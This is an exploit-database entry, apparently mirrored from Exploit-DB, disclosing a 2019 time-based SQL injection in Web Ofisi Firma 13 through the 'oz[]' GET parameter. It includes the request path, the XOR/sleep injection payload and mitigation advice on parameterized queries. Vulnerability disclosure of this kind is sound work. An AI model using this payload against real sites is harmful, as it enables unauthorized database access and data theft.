header-logo
Suggest Exploit
vendor:
Firma 13
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Firma 13
Affected Version From: v13
Affected Version To: v13
Patch Exists: NO
Related CWE: N/A
CPE: a:web_ofisi:firma_13
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

Web Ofisi Firma 13 – ‘oz’ SQL Injection

Web Ofisi Firma 13 is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. The vulnerable parameter is 'oz[]' (GET). The payload used for this exploit is '0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z'.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner. Parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Web Ofisi Firma 13 - 'oz' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html
# Demo Site: http://demobul.net/firmav13/
# Version: v13
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----
Request: http://localhost/[PATH]/kategori/ikinci-el-klima.html?oz[]=1_1
Vulnerable Parameters: oz[] (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

Navigation

Suggest Exploit

Services By CQR